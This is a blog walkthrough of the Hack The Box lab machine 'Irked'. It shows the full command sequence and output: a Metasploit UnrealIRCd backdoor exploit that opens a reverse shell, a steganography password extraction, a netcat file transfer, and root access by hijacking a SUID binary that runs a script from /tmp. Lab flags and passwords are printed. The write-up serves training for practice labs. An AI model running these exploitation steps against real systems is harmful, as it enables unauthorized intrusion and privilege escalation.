18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Irked

3 years ago n0w4n

As always I start with a port scan to get a list of open ports and running services:

# Nmap 7.70 scan initiated Sun Nov 18 20:40:15 2018 as: nmap -v -n -T4 -sS -sV -sC -oN nmap.scan -p- 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.029s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          40080/udp  status
|_  100024  1          47737/tcp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
47737/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 18 20:41:48 2018 -- 1 IP address (1 host up) scanned in 92.87 seconds

Some information about the running webserver:

HTTP/1.1 200 OK
Date: Sun, 18 Nov 2018 20:00:42 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Mon, 14 May 2018 18:00:02 GMT
ETag: "48-56c2e413aa86b"
Accept-Ranges: bytes
Content-Length: 72
Vary: Accept-Encoding
Content-Type: text/html

The browser can’t load the website, but cURL gives some information:

root@n0w4n:~/htb/irked# curl -vv 10.10.10.117
* Rebuilt URL to: 10.10.10.117/
*   Trying 10.10.10.117...
* TCP_NODELAY set
* Connected to 10.10.10.117 (10.10.10.117) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.117
> User-Agent: curl/7.61.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 18 Nov 2018 20:02:29 GMT
< Server: Apache/2.4.10 (Debian)
< Last-Modified: Mon, 14 May 2018 18:00:02 GMT
< ETag: "48-56c2e413aa86b"
< Accept-Ranges: bytes
< Content-Length: 72
< Vary: Accept-Encoding
< Content-Type: text/html
<
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>
* Connection #0 to host 10.10.10.117 left intact

There is a old backdoor exploit for UnrealIRC which can be exploited by metasploit.

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port (TCP)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Target
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117
rhost => 10.10.10.117
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 10.10.14.8:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jREAOnEfvR5esDJE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "jREAOnEfvR5esDJE\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.117:37970) at 2018-11-18 21:27:38 +0100
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
python -c 'import pty;pty.spawn("/bin/bash");'
ircd@irked:~/Unreal3.2$

And it works…..now to take a look around.

ircd@irked:/tmp/n0w4n$ uname -a
uname -a
Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux
ircd@irked:/tmp/n0w4n$ cat /etc/*-release
cat /etc/*-release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

ircd@irked:~$ less .bash_hi
less .bash_history
WARNING: terminal is not fully functional
.bash_history  (press RETURN)
ls
cat aliases
lskeys
ls keys
ls keys/CVS
cd keys
ls
file CVS
cd CVS
ls
ls Root
cat Root/Root
cd Root
ls
file Root
cat Root
cd /
ls
cd /home
ls
cd djmardov
ls
ls *
Input is not a pipe  (press RETURN)
cd /tmp
ls
clear
clear
ls
cd /
ls
cd /var/www/html
ls
cd /tmp
sudo -i
cd /home/ircd
clear
ls
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit

So I did some enumeration and got not very much.
After a while I looked back at what I found and banged my head a few times against the wall for being so blind.
The hint was there for the taking……
The .backup file had some content:

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

The mentioning about steg did me believe it had to do with steganography….but what file. Nothing I found on the system looked like it would work.
But one file did…….I missed it and feel so dumb. The picture on the main page!!!!!

root@n0w4n:~/htb/irked# steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
root@n0w4n:~/htb/irked# cat pass.txt
Kab6h+m+bbp2J:HG

ircd@irked:/tmp$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:/tmp$ id
id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:~/Documents$ cat user.txt
cat user.txt
4a66a78b12dc0e661a59d3f5c0267a8e

Got user now for root.

djmardov@irked:/tmp$ nc -lp 9999 > linenum.sh
root@n0w4n:~/htb/irked# nc -w3 10.10.10.117 9999 < linenum.sh

This is a nice enumeration tool to use for a quick scan of the system.
After a long look at the report I noticed a file that normally isn’t there.

[-] SUID files:
-rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount

Running /usr/bin/viewuser show the following message:

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-26 00:19 (:0)
djmardov pts/0        2018-11-26 13:55 (10.10.14.8)
djmardov pts/1        2018-11-26 13:47 (10.10.14.8)
sh: 1: /tmp/listusers: not found

It is looking for /tmp/listusers but can’t find it. Let’s help it.

djmardov@irked:~$ ls -lah / | grep root
drwxr-xr-x  21 root root 4.0K May 15  2018 .
drwxr-xr-x  21 root root 4.0K May 15  2018 ..
drwxr-xr-x   2 root root 4.0K May 11  2018 bin
drwxr-xr-x   3 root root 4.0K May 15  2018 boot
drwxr-xr-x  16 root root 3.1K Nov 26 00:19 dev
drwxr-xr-x 135 root root  12K Oct 30 14:51 etc
drwxr-xr-x   4 root root 4.0K May 14  2018 home
lrwxrwxrwx   1 root root   33 May 15  2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   33 May 11  2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae
drwxr-xr-x  18 root root 4.0K May 11  2018 lib
drwx------   2 root root  16K May 11  2018 lost+found
drwxr-xr-x   3 root root 4.0K May 11  2018 media
drwxr-xr-x   2 root root 4.0K May 11  2018 mnt
drwxr-xr-x   2 root root 4.0K May 11  2018 opt
dr-xr-xr-x 121 root root    0 Nov 26 00:18 proc
drwx------   2 root root 4.0K Nov  3 04:25 root
drwxr-xr-x  22 root root  820 Nov 26 00:24 run
drwxr-xr-x   2 root root 4.0K Oct 30 14:51 sbin
drwxr-xr-x   2 root root 4.0K May 11  2018 srv
dr-xr-xr-x  13 root root    0 Nov 26 00:18 sys
drwxrwxrwt  11 root root 4.0K Nov 26 14:24 tmp
drwxr-xr-x  10 root root 4.0K May 11  2018 usr
drwxr-xr-x  13 root root 4.0K May 11  2018 var
lrwxrwxrwx   1 root root   29 May 15  2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   29 May 11  2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae

As can be seen the /root folder is set to permission 700.

djmardov@irked:/root$ echo "chmod -R 777 /root" > /tmp/listusers && chmod 777 /tmp/listusers
djmardov@irked:/root$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-26 00:19 (:0)
djmardov pts/0        2018-11-26 13:55 (10.10.14.8)
djmardov pts/1        2018-11-26 13:47 (10.10.14.8)
djmardov@irked:~$ ls -lah / | grep root
drwxr-xr-x  21 root root 4.0K May 15  2018 .
drwxr-xr-x  21 root root 4.0K May 15  2018 ..
drwxr-xr-x   2 root root 4.0K May 11  2018 bin
drwxr-xr-x   3 root root 4.0K May 15  2018 boot
drwxr-xr-x  16 root root 3.1K Nov 26 00:19 dev
drwxr-xr-x 135 root root  12K Oct 30 14:51 etc
drwxr-xr-x   4 root root 4.0K May 14  2018 home
lrwxrwxrwx   1 root root   33 May 15  2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   33 May 11  2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae
drwxr-xr-x  18 root root 4.0K May 11  2018 lib
drwx------   2 root root  16K May 11  2018 lost+found
drwxr-xr-x   3 root root 4.0K May 11  2018 media
drwxr-xr-x   2 root root 4.0K May 11  2018 mnt
drwxr-xr-x   2 root root 4.0K May 11  2018 opt
dr-xr-xr-x 121 root root    0 Nov 26 00:18 proc
drwxrwxrwx   2 root root 4.0K Nov  3 04:25 root
drwxr-xr-x  22 root root  820 Nov 26 00:24 run
drwxr-xr-x   2 root root 4.0K Oct 30 14:51 sbin
drwxr-xr-x   2 root root 4.0K May 11  2018 srv
dr-xr-xr-x  13 root root    0 Nov 26 14:25 sys
drwxrwxrwt  11 root root 4.0K Nov 26 14:24 tmp
drwxr-xr-x  10 root root 4.0K May 11  2018 usr
drwxr-xr-x  13 root root 4.0K May 11  2018 var
lrwxrwxrwx   1 root root   29 May 15  2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   29 May 11  2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae

Looks like the permission on the /root folder has changed to the better.

djmardov@irked:/root$ ls -lah
total 28K
drwxrwxrwx  2 root root 4.0K Nov  3 04:25 .
drwxr-xr-x 21 root root 4.0K May 15  2018 ..
lrwxrwxrwx  1 root root    9 Nov  3 04:25 .bash_history -> /dev/null
-rwxrwxrwx  1 root root  570 Jan 31  2010 .bashrc
-rwxrwxrwx  1 root root   12 Nov  3 04:43 .nano_history
-rwxrwxrwx  1 root root   17 May 14  2018 pass.txt
-rwxrwxrwx  1 root root  140 Nov 19  2007 .profile
-rwxrwxrwx  1 root root   33 May 15  2018 root.txt
djmardov@irked:/root$ cat root.txt
8d8e9e8be64654b6dccc3bff4522daf3

And there we have it. Can’t say I really like this machine and the challenge it presented.
It is more a CTF kinda machine then the regular HTB machines and for something like OSCP training I wouldn’t recommend it.
But it does show that enumeration is key.
 
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.